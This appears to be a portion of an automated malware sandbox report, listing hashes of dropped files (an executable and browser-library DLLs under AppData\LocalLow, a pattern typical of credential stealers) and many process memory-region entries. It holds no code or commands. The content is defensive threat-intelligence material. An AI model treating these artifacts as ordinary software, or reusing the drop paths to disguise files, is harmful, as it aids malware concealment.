SHA512e5d5cd8e39fabe38a63d1bb62469413a5bd8f7fc00b933306cde702500df80a616b16980e5262e232ff85c78f8123e2fbe549b4e26070f9f3fd14eb35e6c569c
-
C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exeMD5
f3eb1441de3cebd14b359c65b5b653f5
SHA177be83e6961da1a8df572568bdb5441232d01f76
SHA2561176a29ec090a8f652a04e4ef39c2a64a04620bad9e2cf408f8dc5e668fee5ff
SHA512e5d5cd8e39fabe38a63d1bb62469413a5bd8f7fc00b933306cde702500df80a616b16980e5262e232ff85c78f8123e2fbe549b4e26070f9f3fd14eb35e6c569c
-
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\mozglue.dllMD5
eae9273f8cdcf9321c6c37c244773139
SHA18378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA51206e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097
-
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\nss3.dllMD5
02cc7b8ee30056d5912de54f1bdfc219
SHA1a6923da95705fb81e368ae48f93d28522ef552fb
SHA2561989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA5120d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5
-
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\softokn3.dllMD5
4e8df049f3459fa94ab6ad387f3561ac
SHA106ed392bc29ad9d5fc05ee254c2625fd65925114
SHA25625a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA5123dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
memory/188-167-0x00000000001F0000-0x00000000001F7000-memory.dmpFilesize
28KB
-
memory/188-168-0x00000000001E0000-0x00000000001EC000-memory.dmpFilesize
48KB
-
memory/188-162-0x0000000000000000-mapping.dmp
-
memory/192-133-0x0000000000400000-0x0000000000919000-memory.dmpFilesize
5.1MB
-
memory/192-132-0x00000000001C0000-0x00000000001FB000-memory.dmpFilesize
236KB
-
memory/192-118-0x0000000000000000-mapping.dmp
-
memory/508-200-0x00000000003C0000-0x00000000003CC000-memory.dmpFilesize
48KB
-
memory/508-199-0x00000000003D0000-0x00000000003D6000-memory.dmpFilesize
24KB
-
memory/508-196-0x0000000000000000-mapping.dmp
-
memory/628-209-0x0000000000000000-mapping.dmp
-
memory/1104-125-0x0000000000000000-mapping.dmp
-
memory/1104-141-0x0000000003330000-0x0000000003573000-memory.dmpFilesize
2.3MB
-
memory/1104-183-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/1104-142-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/1104-180-0x0000000005440000-0x0000000005651000-memory.dmpFilesize
2.1MB
-
memory/1128-157-0x00000000772E0000-0x000000007746E000-memory.dmpFilesize
1.6MB
-
memory/1128-172-0x0000000004F50000-0x0000000004F51000-memory.dmpFilesize
4KB
-
memory/1128-179-0x0000000004F40000-0x0000000004F41000-memory.dmpFilesize
4KB
-
memory/1128-158-0x0000000005560000-0x0000000005561000-memory.dmpFilesize
4KB
-
memory/1128-297-0x0000000007130000-0x0000000007131000-memory.dmpFilesize
4KB
-
memory/1128-273-0x0000000006B00000-0x0000000006B01000-memory.dmpFilesize
4KB
-
memory/1128-272-0x0000000006400000-0x0000000006401000-memory.dmpFilesize
4KB
-
memory/1128-193-0x00000000050C0000-0x00000000050C1000-memory.dmpFilesize
4KB
-
memory/1128-166-0x0000000004EC0000-0x0000000004EC1000-memory.dmpFilesize
4KB
-
memory/1128-154-0x0000000000F50000-0x0000000000F51000-memory.dmpFilesize
4KB
-
memory/1128-145-0x0000000000000000-mapping.dmp
-
memory/1128-163-0x0000000002CB0000-0x0000000002CB1000-memory.dmpFilesize
4KB
-
memory/1256-186-0x00000000010B0000-0x00000000010B9000-memory.dmpFilesize
36KB
-
memory/1256-187-0x00000000010A0000-0x00000000010AF000-memory.dmpFilesize
60KB
-
memory/1256-185-0x0000000000000000-mapping.dmp
-
memory/1500-225-0x0000000000370000-0x0000000000379000-memory.dmpFilesize
36KB
-
memory/1500-224-0x0000000000380000-0x0000000000385000-memory.dmpFilesize
20KB
-
memory/1500-218-0x0000000000000000-mapping.dmp
-
memory/1540-178-0x0000000000000000-mapping.dmp
-
memory/1628-164-0x0000000003070000-0x00000000030E4000-memory.dmpFilesize
464KB
-
memory/1628-165-0x0000000003000000-0x000000000306B000-memory.dmpFilesize
428KB
-
memory/1628-155-0x0000000000000000-mapping.dmp
-
memory/1856-208-0x0000000000000000-mapping.dmp
-
memory/2068-201-0x0000000000000000-mapping.dmp
-
memory/2068-204-0x00000000030A0000-0x00000000030A4000-memory.dmpFilesize
16KB
-
memory/2068-206-0x0000000003090000-0x0000000003099000-memory.dmpFilesize
36KB
-
memory/2072-149-0x0000000000400000-0x0000000000919000-memory.dmpFilesize
5.1MB
-
memory/2072-135-0x0000000000000000-mapping.dmp
-
memory/2160-114-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/2160-115-0x0000000000402E1A-mapping.dmp
-
memory/2172-170-0x0000000000400000-0x0000000000946000-memory.dmpFilesize
5.3MB
-
memory/2172-150-0x0000000000000000-mapping.dmp
-
memory/2172-169-0x0000000000BF0000-0x0000000000C81000-memory.dmpFilesize
580KB
-
memory/2192-228-0x00000000044E0000-0x00000000044E1000-memory.dmpFilesize
4KB
-
memory/2192-256-0x0000000008C50000-0x0000000008C51000-memory.dmpFilesize
4KB
-
memory/2192-232-0x00000000070F0000-0x00000000070F1000-memory.dmpFilesize
4KB
-
memory/2192-245-0x0000000007F60000-0x0000000007F61000-memory.dmpFilesize
4KB
-
memory/2192-255-0x0000000008BE0000-0x0000000008BE1000-memory.dmpFilesize
4KB
-
memory/2192-231-0x0000000007080000-0x0000000007081000-memory.dmpFilesize
4KB
-
memory/2192-216-0x0000000000000000-mapping.dmp
-
memory/2192-227-0x00000000071C0000-0x00000000071C1000-memory.dmpFilesize
4KB
-
memory/2192-261-0x00000000044E3000-0x00000000044E4000-memory.dmpFilesize
4KB
-
memory/2192-238-0x00000000047A0000-0x00000000047A1000-memory.dmpFilesize
4KB
-
memory/2192-254-0x0000000008CC0000-0x0000000008CC1000-memory.dmpFilesize
4KB
-
memory/2192-233-0x0000000007840000-0x0000000007841000-memory.dmpFilesize
4KB
-
memory/2192-230-0x0000000007050000-0x0000000007051000-memory.dmpFilesize
4KB
-
memory/2192-229-0x00000000044E2000-0x00000000044E3000-memory.dmpFilesize
4KB
-
memory/2192-226-0x00000000043F0000-0x00000000043F1000-memory.dmpFilesize
4KB
-
memory/2220-189-0x0000000000000000-mapping.dmp
-
memory/2220-195-0x0000000002D70000-0x0000000002D79000-memory.dmpFilesize
36KB
-
memory/2220-194-0x0000000002D80000-0x0000000002D85000-memory.dmpFilesize
20KB
-
memory/2324-190-0x0000000000000000-mapping.dmp
-
memory/2324-202-0x0000000000400000-0x0000000000919000-memory.dmpFilesize
5.1MB
-
memory/2848-161-0x0000000000000000-mapping.dmp
-
memory/2952-121-0x0000000000000000-mapping.dmp
-
memory/3008-171-0x0000000000000000-mapping.dmp
-
memory/3008-182-0x0000000002D40000-0x0000000002D4B000-memory.dmpFilesize
44KB
-
memory/3008-181-0x0000000002D50000-0x0000000002D57000-memory.dmpFilesize
28KB
-
memory/3016-117-0x00000000012F0000-0x0000000001306000-memory.dmpFilesize
88KB
-
memory/3028-223-0x0000000000400000-0x0000000000919000-memory.dmpFilesize
5.1MB
-
memory/3028-197-0x0000000000000000-mapping.dmp
-
memory/3028-220-0x0000000000B00000-0x0000000000C4A000-memory.dmpFilesize
1.3MB
-
memory/3168-203-0x0000000000000000-mapping.dmp
-
memory/3260-116-0x0000000000030000-0x000000000003A000-memory.dmpFilesize
40KB
-
memory/3292-222-0x0000000000330000-0x0000000000339000-memory.dmpFilesize
36KB
-
memory/3292-221-0x0000000000340000-0x0000000000345000-memory.dmpFilesize
20KB
-
memory/3292-205-0x0000000000000000-mapping.dmp
-
memory/3640-148-0x0000000004F70000-0x000000000546E000-memory.dmpFilesize
5.0MB
-
memory/3640-140-0x0000000005470000-0x0000000005471000-memory.dmpFilesize
4KB
-
memory/3640-143-0x0000000004E20000-0x0000000004E21000-memory.dmpFilesize
4KB
-
memory/3640-281-0x0000000005050000-0x0000000005071000-memory.dmpFilesize
132KB
-
memory/3640-134-0x0000000000490000-0x0000000000491000-memory.dmpFilesize
4KB
-
memory/3640-159-0x0000000004ED0000-0x0000000004ED1000-memory.dmpFilesize
4KB
-
memory/3640-129-0x0000000000000000-mapping.dmp
-
memory/3832-553-0x0000000000000000-mapping.dmp
-
memory/3880-139-0x0000000000000000-mapping.dmp
-
memory/4060-176-0x0000000000320000-0x0000000000321000-memory.dmpFilesize
4KB
-
memory/4060-188-0x0000000000960000-0x0000000000962000-memory.dmpFilesize
8KB
-
memory/4060-173-0x0000000000000000-mapping.dmp
-
memory/4280-250-0x0000000002410000-0x0000000002415000-memory.dmpFilesize
20KB
-
memory/4280-251-0x0000000000850000-0x0000000000855000-memory.dmpFilesize
20KB
-
memory/4280-249-0x0000000000800000-0x0000000000806000-memory.dmpFilesize
24KB
-
memory/4280-246-0x000000001AF70000-0x000000001AF72000-memory.dmpFilesize
8KB
-
memory/4280-240-0x0000000000000000-mapping.dmp
-
memory/4484-296-0x0000000009B00000-0x0000000009C5B000-memory.dmpFilesize
1.4MB
-
memory/4484-292-0x0000000007233000-0x0000000007234000-memory.dmpFilesize
4KB
-
memory/4484-290-0x000000000A010000-0x000000000A011000-memory.dmpFilesize
4KB
-
memory/4484-275-0x0000000007230000-0x0000000007231000-memory.dmpFilesize
4KB
-
memory/4484-276-0x0000000007232000-0x0000000007233000-memory.dmpFilesize
4KB
-
memory/4484-262-0x0000000000000000-mapping.dmp
-
memory/4708-282-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/4708-285-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/4708-283-0x000000000044003F-mapping.dmp
-
memory/4892-298-0x0000000000000000-mapping.dmp
-
memory/4892-356-0x00000000045C3000-0x00000000045C4000-memory.dmpFilesize
4KB
-
memory/4892-333-0x000000007DF40000-0x000000007DF41000-memory.dmpFilesize
4KB
-
memory/4892-305-0x00000000045C2000-0x00000000045C3000-memory.dmpFilesize
4KB
-
memory/4892-304-0x00000000045C0000-0x00000000045C1000-memory.dmpFilesize
4KB